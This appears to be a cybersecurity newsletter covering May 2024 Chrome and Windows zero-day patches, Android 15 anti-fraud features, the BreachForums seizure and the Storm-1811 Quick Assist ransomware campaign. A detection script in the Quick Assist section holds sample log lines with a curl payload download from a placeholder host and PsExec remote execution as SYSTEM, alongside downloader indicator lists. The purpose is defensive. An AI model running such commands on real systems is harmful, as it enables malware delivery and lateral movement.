New advanced Android features protect from scams

May 17 2024



Welcome to Gone Phishing, your daily cybersecurity newsletter that’s got that Friday feeling! 🎉🎉🎉

It’s Friday, folks, which can only mean one thing… It’s time for our weekly segment!

It goes by many names. Patch of the Week, Tweak of the Week. Okay, that’s it.

Congrats, the cybercriminals are no match… for your patch! 🩹🩹🩹

🚨 Google Chrome Users: Update Now to Patch New Zero-Day! 🔒

Google has rolled out fixes for nine security issues in Chrome, including a zero-day vulnerability actively exploited in the wild! 🛡️ CVE-2024-4947, a type confusion bug in the V8 JavaScript and WebAssembly engine reported by Kaspersky researchers, can be abused to achieve arbitrary code execution in the renderer. 😱 It is the third Chrome zero-day Google has patched within a week, after CVE-2024-4671 and CVE-2024-4761. 🛠️ To stay safe, update to Chrome version 125.0.6422.60/.61 for Windows and macOS, and 125.0.6422.60 for Linux (chrome://settings/help shows the installed version and triggers the update). Users of Chromium-based browsers like Microsoft Edge, Brave, Opera, and Vivaldi should also apply the fixes as soon as their vendors ship them! 🔄

🚨 Microsoft Issues Vital Security Patches: Update Now! 🔒

Microsoft has rolled out fixes for 61 security flaws in its May 2024 Patch Tuesday update, including two zero-days actively exploited in the wild! 🛡️ Of these, one is rated Critical, 59 Important, and one Moderate. Separately, 30 vulnerabilities in the Chromium-based Edge browser were addressed, including the two Chromium zero-days (CVE-2024-4671 and CVE-2024-4761). The exploited Windows zero-days are:

  • CVE-2024-30040 (CVSS 8.8): MSHTML Platform Security Feature Bypass

  • CVE-2024-30051 (CVSS 7.8): Desktop Window Manager (DWM) Core Library Elevation of Privilege

Exploitation of these flaws could allow attackers to execute arbitrary code and gain SYSTEM privileges! 😱 Attackers can exploit CVE-2024-30040 by tricking a user into opening a specially crafted document, bypassing the OLE mitigations in Microsoft 365 and Office that normally block untrusted embedded controls; CVE-2024-30051 then lets a local attacker elevate to SYSTEM. Microsoft urges users to update immediately to mitigate these threats. CISA has added both to its Known Exploited Vulnerabilities catalogue, and federal agencies must apply the fixes by June 4, 2024. 🗓️ This update also addresses critical remote code execution bugs in the Windows Mobile Broadband Driver and Windows Routing and Remote Access Service (RRAS), among others. Stay secure by prioritising updates and reviewing your security posture.

Now, on to today’s hottest cybersecurity news stories:

  • 📱 Android users rejoice! New advanced features protect from scams 🛡️

  • 👮 FBI shuts down BreachForums platform for second time in a year 📅

  • 👨‍💻 Hackers abuse Microsoft’s Quick Assist feature for ransomware 💰

These aren’t the Androids you’re looking for 😵‍💫

📱 Android 15 Introduces Robust Security Features to Combat Malware 🛡️🔒

Enhanced Play Integrity API

Google is rolling out a suite of new features in Android 15 and Google Play aimed at stopping malicious apps from capturing sensitive data. The updated Play Integrity API gives third-party developers new signals about the device and the apps running on it, so an app can refuse to perform sensitive actions when the environment looks compromised.

🔍 Key Updates

Developers can check whether other apps on the device might be capturing the screen, drawing overlays, or controlling the device (for example through accessibility services). An app can use this to hide sensitive information or pause a transaction while such an app is active, which is crucial for protecting users from overlay and screen-reading scams. The Play Integrity API can also verify that Google Play Protect is active and that the device is free of known malware before the app performs a sensitive action.

🛠️ Expanded Restricted Settings

With Android 15, restricted settings are getting stronger. Additional user approval is now required before permissions can be enabled for apps installed from internet-sideloading sources (web browsers, messaging apps, or file managers), building on the restricted-settings protection Android 13 introduced for accessibility and notification-listener access.

⚠️ Proactive Fraud Detection

Developers can opt in to receive a "recent device activity" signal that reports how many integrity tokens the app has requested from a given device in the last hour; an abnormally high volume points to automated attack tooling rather than a real user. Together, these signals target Android banking trojans that abuse accessibility services to draw overlays over legitimate apps and to disable security mechanisms.
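To make the two Play Integrity signals above concrete, here is an added example (my code, not Google's and not from the article) of the server-side policy an app backend might apply to a decoded verdict: it binds the token to the request with a nonce and freshness check, requires a Play-recognised app on a device that meets integrity, denies when an app not installed from Play is capturing, overlaying or controlling the screen, steps up authentication when Play Protect is off or unsure, and treats the highest recent-device-activity bucket as automation. The decryption and signature verification that precede this step, the field names and enum values (appAccessRiskVerdict, appsDetected, playProtectVerdict, recentDeviceActivity, deviceActivityLevel) and the sample verdicts are assumptions to check against the current Play Integrity documentation; the 5-minute freshness window and the ALLOW/STEP_UP/DENY policy are my choices.

```python
"""Server-side policy over a decoded Play Integrity verdict.

Added example with constructed sample verdicts; not Google's code and not from
the article. Assumptions: the verdict JSON has already been decrypted and its
signature verified (via Google's decodeIntegrityToken endpoint or local keys),
and the field names follow the Play Integrity verdict format as published at the
time of writing, so check them against the current documentation.
"""
from dataclasses import dataclass, field

ALLOW, STEP_UP, DENY = "ALLOW", "STEP_UP", "DENY"
MAX_TOKEN_AGE_MS = 5 * 60 * 1000   # assumption: a token older than 5 minutes is stale/replayed


@dataclass
class Decision:
    outcome: str = ALLOW
    reasons: list = field(default_factory=list)

    def deny(self, why: str) -> None:
        self.outcome = DENY
        self.reasons.append(why)

    def step_up(self, why: str) -> None:
        if self.outcome != DENY:      # never downgrade a DENY to STEP_UP
            self.outcome = STEP_UP
        self.reasons.append(why)


def evaluate_verdict(verdict: dict, expected_nonce: str, now_ms: int) -> Decision:
    """Decide whether a sensitive action (e.g. a transfer) may proceed on this device."""
    d = Decision()

    # 1. Binding and freshness: the nonce ties the token to this server-side request,
    #    and an old timestamp means a replayed token from an earlier, possibly clean, state.
    req = verdict.get("requestDetails", {})
    if req.get("nonce") != expected_nonce:
        d.deny("nonce mismatch: token was not issued for this request")
    age = now_ms - int(req.get("timestampMillis", 0))
    if age < 0 or age > MAX_TOKEN_AGE_MS:
        d.deny(f"token age {age} ms is outside the freshness window")

    # 2. App integrity: only the Play-distributed build of our own app is trusted.
    if verdict.get("appIntegrity", {}).get("appRecognitionVerdict") != "PLAY_RECOGNIZED":
        d.deny("app binary not recognised by Play (repackaged or sideloaded build)")

    # 3. Device integrity, plus the recent-activity signal: LEVEL_4 is the highest
    #    request-volume bucket and is typical of automated abuse rather than a person.
    dev = verdict.get("deviceIntegrity", {})
    if "MEETS_DEVICE_INTEGRITY" not in dev.get("deviceRecognitionVerdict", []):
        d.deny("device fails Play integrity (rooted, emulator or uncertified)")
    level = dev.get("recentDeviceActivity", {}).get("deviceActivityLevel", "UNEVALUATED")
    if level == "LEVEL_4":
        d.deny("abnormally many integrity requests from this device in the last hour")
    elif level == "LEVEL_3":
        d.step_up("elevated integrity-request volume from this device")

    # 4. Environment: other apps capturing, controlling or overlaying the screen, and
    #    the Play Protect state. UNKNOWN_* entries are apps not installed from Play.
    env = verdict.get("environmentDetails", {})
    for app in env.get("appAccessRiskVerdict", {}).get("appsDetected", []):
        source, _, behaviour = app.partition("_")
        if behaviour not in ("CAPTURING", "CONTROLLING", "OVERLAYS"):
            continue                  # *_INSTALLED entries are informational only
        if source == "UNKNOWN" or behaviour == "CONTROLLING":
            d.deny(f"{app}: another app can read or drive the screen")
        else:
            d.step_up(f"{app}: a Play-installed app has screen access")
    pp = env.get("playProtectVerdict", "UNEVALUATED")
    if pp in ("MEDIUM_RISK", "HIGH_RISK"):
        d.deny(f"Play Protect verdict {pp}: known harmful apps present")
    elif pp in ("POSSIBLE_RISK", "NO_DATA"):
        d.step_up(f"Play Protect verdict {pp}: Play Protect off or unverified apps present")
    return d


# Constructed sample data (not real devices or tokens).
NOW_MS = 1_715_900_000_000           # pretend "now": 16 May 2024 (UTC)
NONCE = "session-7f3a9c-constructed-nonce"


def _verdict(level, apps, play_protect, nonce=NONCE, age_ms=20_000):
    return {
        "requestDetails": {"requestPackageName": "com.example.bank",
                           "nonce": nonce, "timestampMillis": NOW_MS - age_ms},
        "appIntegrity": {"appRecognitionVerdict": "PLAY_RECOGNIZED"},
        "deviceIntegrity": {"deviceRecognitionVerdict": ["MEETS_DEVICE_INTEGRITY", "MEETS_BASIC_INTEGRITY"],
                            "recentDeviceActivity": {"deviceActivityLevel": level}},
        "environmentDetails": {"appAccessRiskVerdict": {"appsDetected": apps},
                               "playProtectVerdict": play_protect},
    }


CLEAN_VERDICT = _verdict("LEVEL_1", ["KNOWN_INSTALLED"], "NO_ISSUES")
# Sideloaded app capturing the screen and drawing overlays, Play Protect unsure, heavy token churn.
OVERLAY_TROJAN_VERDICT = _verdict("LEVEL_4", ["KNOWN_INSTALLED", "UNKNOWN_INSTALLED",
                                              "UNKNOWN_CAPTURING", "UNKNOWN_OVERLAYS"], "POSSIBLE_RISK")
# Healthy device but Play Protect disabled: ask for a second factor rather than refuse outright.
NO_PLAY_PROTECT_VERDICT = _verdict("LEVEL_1", ["KNOWN_INSTALLED"], "NO_DATA")
# A clean verdict captured earlier and replayed an hour later.
REPLAYED_VERDICT = _verdict("LEVEL_1", ["KNOWN_INSTALLED"], "NO_ISSUES", age_ms=60 * 60 * 1000)

if __name__ == "__main__":
    for name, v in [("clean", CLEAN_VERDICT), ("overlay trojan", OVERLAY_TROJAN_VERDICT),
                    ("no play protect", NO_PLAY_PROTECT_VERDICT), ("replayed", REPLAYED_VERDICT)]:
        result = evaluate_verdict(v, NONCE, NOW_MS)
        print(f"{name:16} -> {result.outcome}", *result.reasons, sep="\n    ")
```

Run it directly to see each sample verdict's outcome and reasons. The design point is that the decision runs on the server: a client-side check can be patched out by the same malware the verdict is meant to detect, and the nonce and timestamp checks stop an attacker from replaying a verdict captured while the device was still clean.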

🔍 Enhanced Fraud Protection Pilot

Google is piloting enhanced fraud protection in regions where malicious sideloaded apps are prevalent, such as Singapore and Thailand. This protection blocks installs from internet-sideloading sources of apps that declare the four runtime permissions most often abused for financial fraud: RECEIVE_SMS, READ_SMS, BIND_Notifications, and Accessibility.

📡 Cellular Security Enhancements

Google is also enhancing cellular security: Android 15 can alert users when their network connection is unencrypted, so calls and SMS could be intercepted, and when a false cellular base station or surveillance tool is recording their location using a device identifier. Both alerts depend on modem support and OEM integration, so they will not appear on every device that upgrades.

🔐 Tightened Screen Sharing Controls

Android 15 will automatically hide notification content during screen sharing, so one-time passwords (OTPs) delivered via SMS are not exposed to whoever is viewing the shared screen, closing a common attack vector for fraud and spyware.

🧠 Live Threat Detection

Google Play Protect's on-device AI capabilities are getting an upgrade with live threat detection. This feature uses the Private Compute Core (PCC) infrastructure to flag anomalous patterns on the device and analyse behavioural signals related to the use of sensitive permissions.

🔍 Real-Time Scanning

The new live threat detection builds on recently added real-time scanning capabilities to combat novel malicious apps and spot emerging threats, ensuring users are better protected against the latest cyber threats.

🛡️ Staying Ahead of Threats

"We're continuously working on improving and evolving our protections to stay ahead of bad actors," said Dave Kleidermacher, vice president of engineering for Android security and privacy. "With these new features, we aim to provide users with the highest level of security and privacy."

Google is collaborating with original equipment manufacturers (OEMs) to roll out these features to users over the next couple of years, ensuring comprehensive protection across the Android ecosystem.

My Favorite Newsletter: Stay ahead on the business of AI

Have you heard of Prompts Daily newsletter? I recently came across it and absolutely love it.

AI news, insights, tools and workflows. If you want to keep up with the business of AI, you need to be subscribed to the newsletter (it’s free).

Read by executives from industry-leading companies like Google, Hubspot, Meta, and more.

Want to receive daily intel on the latest in business/AI?

In just ONE click, you can quickly sign up to the free Prompts Daily newsletter.

That’ll Breach ’em 😏

🔒 BreachForums Seized Again by Authorities! 🚔🎯

Law Enforcement Strikes

Law enforcement agencies have seized control of the notorious BreachForums platform, an online marketplace for stolen data, for the second time in a year.

🛑 Seizure Notice

The BreachForums website ("breachforums[.]st") now displays a seizure banner from the U.S. Federal Bureau of Investigation (FBI).

🌍 Global Effort

This operation was a collaborative effort involving authorities from Australia, Iceland, New Zealand, Switzerland, the U.K., the U.S., and Ukraine.

📱 Telegram Takeover

The FBI has also taken control of the Telegram channel operated by Baphomet, the administrator who took over after Conor Brian Fitzpatrick (aka pompompurin) was arrested in March 2023.

📜 Official Message

A message on the seized Telegram channel reads: "This Telegram chat is under the control of the FBI. The BreachForums website has been taken down by the FBI and DOJ with assistance from international partners."

🔍 Investigation Ongoing

Authorities are reviewing the site's backend data and encourage reporting cyber criminal activity via specified FBI contact points.

🚨 Administrator Status

It's unclear if Baphomet and co-administrator ShinyHunters have been arrested, but the seizure banner shows their profile pictures behind bars.

🔎 Forum History

BreachForums emerged in March 2022 after the takedown of RaidForums. The original site went offline in March 2023 following Fitzpatrick's arrest, but it resurfaced in June 2023 under Baphomet and ShinyHunters.

💼 Contraband Marketplace

From June 2023 to May 2024, BreachForums operated as a marketplace for cybercriminals to buy, sell, and trade illegal goods, including stolen data and hacking tools.

Hackers got us yelling: Quick, Assist! 💀

⚠️ Storm-1811 Abuses Quick Assist for Ransomware Attacks 🎯🔍

Microsoft's Threat Intelligence team has identified a threat actor, Storm-1811, using Quick Assist in social engineering attacks to deploy ransomware.

🎭 Impersonation Tactics

Storm-1811, a financially motivated group known for deploying Black Basta ransomware, uses voice phishing to talk victims into granting access through remote management tools such as Quick Assist, then uses that access to deliver QakBot, Cobalt Strike, and ultimately Black Basta ransomware.

🛠️ Quick Assist Misuse

Quick Assist is a legitimate Microsoft application for remote troubleshooting, and no vulnerability in it is being exploited: the attackers simply persuade victims to let them in. They impersonate trusted contacts, such as Microsoft tech support or the company's own IT helpdesk, to gain access to devices.

💻 Attack Method

The attackers first flood the victim's inbox with subscription emails (a technique Microsoft calls link listing, in which the target's address is signed up to many mailing lists at once), then call posing as IT support offering to fix the problem. Victims are persuaded to accept a Quick Assist session, after which the attackers run commands and download malicious payloads on the machine.

🔗 Chain of Attack

  1. Phishing Call: Impersonation and persuasion to use Quick Assist.

  2. Access Gained: Running commands to download malware.

  3. Ransomware Deployment: Using PsExec for spreading Black Basta ransomware.
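The three steps above are a sequence an endpoint telemetry pipeline can look for. Below is an added example (not Microsoft's detection logic and not from the article) that scans process-creation events for a Quick Assist session followed, within a window, by a command-line download and then PsExec on the same host. The log lines are constructed, their "time|host|image|command line" layout is a simplified stand-in for Sysmon Event ID 1 or Windows 4688 records, and the indicator lists (curl.exe, certutil.exe, bitsadmin.exe, PowerShell download cmdlets, PsExec binaries) are my guesses at what "running commands to download malware" and "spreading with PsExec" look like on disk, not indicators taken from the report.

```python
"""Correlate the Quick Assist -> download -> PsExec chain over process-creation events.

Added example, not Microsoft's detection logic; the log lines below are constructed.
Assumptions: events arrive as 'ISO time|host|image path|command line' (a flattened
stand-in for Sysmon Event ID 1 or Windows 4688 records), and the indicator lists
are my choices for what "download malware" and "spread with PsExec" look like
on disk, not names taken from the article.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(hours=2)   # assumption: the hands-on phase fits one support-call window

REMOTE_ASSIST = {"quickassist.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
PS_DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile", "start-bitstransfer")
LATERAL = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}
STAGES = ("remote_assist", "download", "lateral")


def classify(image: str, cmdline: str):
    """Map one process-creation event to a chain stage, or None if it is irrelevant."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    low = cmdline.lower()
    if name in REMOTE_ASSIST:
        return "remote_assist"
    if name in DOWNLOADERS:
        return "download"
    if name in ("powershell.exe", "pwsh.exe") and any(m in low for m in PS_DOWNLOAD_MARKERS):
        return "download"
    if name in LATERAL:
        return "lateral"
    return None


def parse_event(line: str):
    ts, host, image, cmdline = line.split("|", 3)
    return datetime.fromisoformat(ts), host, image, cmdline


def find_chains(lines):
    """Return {host: [(time, stage, image, cmdline), ...]} for every host on which a
    Quick Assist session is followed, in order and within WINDOW, by a download and PsExec."""
    by_host = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, host, image, cmd = parse_event(line.strip())
        stage = classify(image, cmd)
        if stage:
            by_host[host].append((ts, stage, image, cmd))

    alerts = {}
    for host, events in by_host.items():
        events.sort(key=lambda e: e[0])
        for i, start in enumerate(events):
            if start[1] != "remote_assist":
                continue
            chain, want = [start], 1
            for ev in events[i + 1:]:
                if ev[0] - start[0] > WINDOW:
                    break                      # too long after the session to belong to it
                if ev[1] == STAGES[want]:
                    chain.append(ev)
                    want += 1
                    if want == len(STAGES):
                        alerts[host] = chain
                        break
            if host in alerts:
                break
    return alerts


# Constructed sample telemetry: one full chain, one genuine IT session, one lone download.
SAMPLE_EVENTS = r"""
2024-05-10T13:58:40|WS-0417|C:\Windows\explorer.exe|explorer.exe
2024-05-10T14:02:11|WS-0417|C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_1.0.0.0_x64__8wekyb3d8bbwe\QuickAssist.exe|QuickAssist.exe
2024-05-10T14:11:37|WS-0417|C:\Windows\System32\curl.exe|curl.exe -s -o C:\Users\Public\update.zip http://example.invalid/update.zip
2024-05-10T14:12:02|WS-0417|C:\Windows\System32\cmd.exe|cmd.exe /c tar -xf C:\Users\Public\update.zip -C C:\Users\Public
2024-05-10T14:31:55|WS-0417|C:\Users\Public\PsExec.exe|PsExec.exe \\FS01 -accepteula -s -d cmd /c C:\Users\Public\run.bat
2024-05-10T09:15:00|WS-0099|C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_1.0.0.0_x64__8wekyb3d8bbwe\QuickAssist.exe|QuickAssist.exe
2024-05-10T09:40:12|WS-0099|C:\Windows\System32\notepad.exe|notepad.exe C:\Temp\printer.log
2024-05-10T16:05:00|WS-0123|C:\Windows\System32\curl.exe|curl.exe -O https://example.invalid/tool.zip
2024-05-10T16:09:00|WS-0123|C:\Tools\PsExec64.exe|PsExec64.exe \\WS-0124 -s cmd
""".strip().splitlines()

if __name__ == "__main__":
    for host, chain in find_chains(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: Quick Assist session followed by download and PsExec")
        for ts, stage, _, cmd in chain:
            print(f"  {ts:%H:%M:%S} {stage:14} {cmd}")
```

Quick Assist itself is legitimate, so a Quick Assist event alone is not an alert; only the ordered chain on one host is. Expect to allowlist helpdesk workstations where a support session is routinely followed by tool installs, and to extend DOWNLOADERS and LATERAL to whatever your environment actually sees.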

🔍 Ongoing Response

Microsoft is investigating the misuse of Quick Assist and plans to add warnings to alert users about potential tech support scams.

🎯 Targeted Industries

The campaign, starting mid-April 2024, has targeted sectors like manufacturing, construction, food and beverage, and transportation, indicating a broad attack scope.

🔒 Top Tips

  • Block/Uninstall: Remove Quick Assist and similar remote-management tools if unused. On current Windows builds Quick Assist ships both as the App.Support.QuickAssist optional feature and as the MicrosoftCorporationII.QuickAssist Store app, so check for both.

  • Employee Training: Educate staff to identify tech support scams.

  • Focus on Prevention: Invest in detecting and disrupting the earlier stages (the vishing call, the Quick Assist session, the payload download) before ransomware is deployed.

📢 Expert Insights

"Ransomware remains a lucrative tactic for attackers due to its low entry barrier and high impact," said Robert Knapp, Rapid7. Organisations should enhance security measures and focus on early attack stages to reduce risks.

🔗 Collaborative Effort

Microsoft describes Black Basta as a "closed ransomware offering" relying on a few threat actors who partner for access and malware development. Since April 2022, Black Basta has been deployed following access from QakBot and other distributors, highlighting the importance of early-stage defence.

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵 Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈 Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!
